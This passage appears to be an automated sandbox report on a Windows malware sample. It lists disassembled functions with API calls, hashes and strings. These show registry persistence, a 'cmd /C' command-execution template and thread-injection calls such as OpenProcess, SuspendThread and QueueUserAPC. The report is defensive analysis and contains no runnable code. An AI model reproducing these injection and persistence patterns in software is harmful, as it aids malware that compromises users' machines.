    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
